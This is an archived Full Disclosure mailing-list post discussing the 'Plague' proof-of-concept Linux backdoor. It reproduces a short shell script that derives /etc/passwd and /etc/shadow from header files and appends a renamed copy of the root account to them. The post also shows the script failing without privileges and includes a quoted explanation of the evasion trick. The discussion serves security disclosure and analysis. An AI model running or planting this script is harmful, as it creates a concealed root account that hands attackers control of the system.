Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Plague Proof of Concept Linux backdoor
From: hijacker () oldum net
Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completly out of the subject and and the same time some of
which offensive to me!

Let's go into more detauls on that backdoor.

I created the file test1.sh containing:

hijacker () hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I chmod 700 test1.sh
then I run:

hijacker () hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


On 22 Oct 06, at 04:29, hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do,
except
to create two files in there $HOME directories containing
expressions from
paths.h and sysexits.h ?

Why would that be considered a backdoor?

The awk commands parse out the strings "/etc/passwd" and "/etc/
shadow" from
the headers. It's still rather easily detected - most of the rootkit-
checking
programs will detect an alternate uid0 account very quickly - but it
does
demonstrate an interesting way of avoiding target strings in the binary.






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]